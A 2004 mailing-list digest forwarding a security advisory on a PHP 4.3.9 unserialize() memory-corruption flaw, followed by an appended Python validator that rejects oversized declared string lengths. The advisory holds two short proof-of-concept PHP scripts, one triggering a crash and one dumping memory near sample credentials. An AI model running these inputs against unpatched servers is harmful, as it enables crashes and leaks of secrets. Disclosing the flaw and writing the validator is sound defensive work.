[Please upgrade PHP on all platforms.  Not clear yet whether this only
affects PHP4 or later versions also -- Raju]

This is an RFC 1153 digest.
(1 message)
----------------------------------------------------------------------

Message-Id: <[EMAIL PROTECTED]>
From: Martin Eiszner <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: php unserialize
Date: Wed, 15 Dec 2004 22:32:54 +0100


==============================================================
SEC-CONSULT Security Advisory PHP - 4.3.9 unserialize function
======================OOOOOOOOOOOO============================

Product:        PHP 4.3.9 (Win32/Unix)
Remarks:        no other Versions tested but very likely vulnerable

Vulnerabilities:

- Data Segment memory corruption
- Information disclosure / Memory dumping

Vendor:         PHP (http://www.php.net/)
Vendor-Status:  vendor contacted (19.11.2004)
Vendor-Patches: vendor has released bugfixed versions

Object: ---

Exploitable:
Local:          ---
Remote:         PARTIAL (OS-dependent)

============
Introduction
============

Visit "http://www.php.net" for additional information.


=====================
Vulnerability Details
=====================


1) Memory Corruption / buffer overflow
======================================

FUNCTION:
unserialize (http://at.php.net/manual/en/function.unserialize.php)

DESCRIPTION:
Insufficient input validation of serialized strings leads to memory corruption 
and information disclosure.

EXAMPLE script - "Segfault":
---cut here---
<?php
// declared length (9999999) is far larger than the single byte actually present
$s = 's:9999999:"A";"';
$a = unserialize($s);
print $a;
?>
---cut here---

REMARKS:
leads to arbitrary code execution and file/information disclosure.


EXAMPLE script - "Memory Dump":
---cut here---
<?php
// session- and stuff
$secret_username="uaaaa";
$secret_password="hoschi";

// stuff
// $c = $_COOKIE ['crypted_stuff']
// $c = some cookie
/* simplified --> userinput */ $c = 's:30000:"crap";';

// declared length (30000) exceeds the 4 bytes present
$userdata = unserialize($c);
//
// check $userdata stuff
// for some reason output $userdata
print $userdata . "\n is NOT valid !!\n";

// stuff
?>
---cut here---


REMARKS:
Could theoretically be used to circumvent safe-mode and/or gain sensitive 
information about script- and memory areas.


===============
GENERAL REMARKS
===============
We would like to apologize in advance for potential nonconformities and/or 
known issues.

=========================================================================================================================
FOR SOME STRANGE REASONS HARDENED-PHP.NET HAS RELEASED THIS ADVISORY TODAY 
TOGETHER WITH A BUNCH OF OTHER VULNERABILITIES
=========================================================================================================================

====================
Recommended Hotfixes
====================

Vendor-Patches: vendor has released bugfixed versions

=======
Contact
=======

SEC-CONSULT
Austria / EUROPE
[EMAIL PROTECTED]


EOF Martin Eiszner / @[EMAIL PROTECTED]




------------------------------

End of this Digest
******************

-- 
Raj Mathur                [EMAIL PROTECTED]      http://kandalaya.org/
       GPG: 78D4 FC67 367F 40E2 0DD5  0FEF C968 D0EF CC68 D17F
                      It is the mind that moves
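Both payloads in the advisory share one property: the length field of an
`s:N:"...";` element is larger than the number of bytes that follow it, and
PHP 4.3.9 trusted N instead of checking it against the remaining input. The
checker below is an added example written for this digest; it is not
SEC-CONSULT's code and not PHP's own unserialize() implementation. It parses
the scalar/array subset of the serialize() format (s, i, b, d, N, a) and
rejects any input whose declared string length does not fit inside the bytes
actually present, so the two advisory payloads fail before anything is
decoded. The function names (`safe_unserialize`, `is_well_formed`) and the
valid sample payload are assumptions constructed for the example.

```python
"""Strict pre-validator for PHP's serialize() format (added example, not code
from the advisory or from PHP). Every 's:N:"' element must be followed by
exactly N bytes and the closing '";'; a declared N that exceeds the remaining
input is rejected instead of being used as a read length."""


class SerializeError(ValueError):
    pass


def _expect(data, pos, token):
    """Require the literal `token` at data[pos:]; return the position after it."""
    if not data.startswith(token, pos):
        raise SerializeError("expected %r at offset %d" % (token, pos))
    return pos + len(token)


def _read_until(data, pos, stop):
    """Return (bytes before `stop`, position after `stop`)."""
    end = data.find(stop, pos)
    if end < 0:
        raise SerializeError("unterminated field at offset %d" % pos)
    return data[pos:end], end + len(stop)


def _parse(data, pos, depth=0):
    """Parse one serialized value at data[pos:]; return (value, new_pos)."""
    if depth > 32:
        raise SerializeError("nesting too deep")
    if pos >= len(data):
        raise SerializeError("unexpected end of data at offset %d" % pos)
    tag = data[pos:pos + 1]
    if tag == b"N":                                   # N;
        return None, _expect(data, pos + 1, b";")
    if tag in (b"i", b"b", b"d"):                     # i:42;  b:1;  d:1.5;
        raw, pos = _read_until(data, _expect(data, pos + 1, b":"), b";")
        if tag == b"i":
            return int(raw), pos
        if tag == b"b":
            if raw not in (b"0", b"1"):
                raise SerializeError("bad boolean %r" % raw)
            return raw == b"1", pos
        return float(raw), pos
    if tag == b"s":                                   # s:N:"bytes";
        raw, pos = _read_until(data, _expect(data, pos + 1, b":"), b':"')
        if not raw.isdigit():
            raise SerializeError("bad string length %r" % raw)
        length = int(raw)
        # This is the check the vulnerable version skipped: N must fit inside
        # the bytes that remain, leaving room for the closing '";'.
        remaining = len(data) - pos
        if length > remaining - 2:
            raise SerializeError("declared length %d exceeds remaining %d bytes"
                                 % (length, remaining))
        value = data[pos:pos + length]
        return value, _expect(data, pos + length, b'";')
    if tag == b"a":                                   # a:N:{key;value;...}
        raw, pos = _read_until(data, _expect(data, pos + 1, b":"), b":{")
        count = int(raw)
        result = {}
        for _ in range(count):
            key, pos = _parse(data, pos, depth + 1)
            if isinstance(key, bool) or not isinstance(key, (int, bytes)):
                raise SerializeError("array key must be int or string")
            value, pos = _parse(data, pos, depth + 1)
            result[key] = value
        return result, _expect(data, pos, b"}")
    raise SerializeError("unknown or unsupported type %r at offset %d" % (tag, pos))


def safe_unserialize(data):
    """Decode `data` (str or bytes) or raise SerializeError. Trailing bytes
    after the value are rejected as well."""
    if isinstance(data, str):
        data = data.encode("latin-1")
    value, pos = _parse(data, 0)
    if pos != len(data):
        raise SerializeError("trailing garbage at offset %d" % pos)
    return value


def is_well_formed(data):
    """True only if `data` parses completely under the strict rules above."""
    try:
        safe_unserialize(data)
        return True
    except ValueError:          # SerializeError, int()/float() failures
        return False


if __name__ == "__main__":
    # The two payloads from the advisory, and one constructed valid record.
    for payload in ('s:9999999:"A";"', 's:30000:"crap";',
                    'a:2:{s:4:"user";s:5:"uaaaa";s:4:"pass";s:6:"hoschi";}'):
        print("%-60s well-formed=%s" % (payload, is_well_formed(payload)))
```

The larger lesson for the cookie scenario in the advisory stands regardless of
the PHP version: data that an attacker controls should not reach unserialize()
at all. Authenticate the cookie first (for example with an HMAC over the
serialized bytes and a server-side secret) and only decode values whose tag
verifies; a format checker like the one above is a second line of defence, not
a substitute for that.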


_______________________________________________
linux-india-help mailing list
[EMAIL PROTECTED]
https://lists.sourceforge.net/lists/listinfo/linux-india-help
